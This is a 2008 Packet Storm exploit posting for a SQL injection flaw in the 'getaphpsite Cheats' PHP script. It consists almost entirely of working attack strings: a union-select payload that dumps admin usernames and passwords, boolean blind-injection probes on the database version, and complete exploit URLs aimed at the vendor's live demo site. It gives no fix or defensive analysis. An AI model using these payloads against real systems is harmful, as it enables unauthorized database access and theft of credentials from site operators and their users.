getaphpsite Cheats SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73499
Type packetstorm
Reporter ZoRLu
Modified 2008-12-31T00:00:00

Description

                                        
                                            `[~] getaphpsite Cheats (id) R-Sql & B-Sql inj : ) )  
[~]  
[~] script: http://www.getaphpsite.com/134.html  
[~]  
[~]----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com  
[~]  
[~] Date: 31.12.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com / www.experl.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~] -----------------------------------------------------------  
  
Exp 1: ( Remote )  
  
http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[SQL] ( Reklam Kokusu AlIyorum : ) z0rlu.blogspot.com )  
  
[SQL]=  
  
0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--  
  
exp 2: ( Blind )  
  
http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[BLiND]  
  
[id]+and+substring(@@version,1,1)=5 ( true )  
  
[id]+and+substring(@@version,1,1)=4 ( false )  
  
  
for demo: ( Remote )  
  
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--  
  
  
for demo: ( Blind )  
  
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=5 ( true )  
  
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=4 ( false )  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: yildirimordulari.org & experl.com  
[~]  
[~]----------------------------------------------------------------------`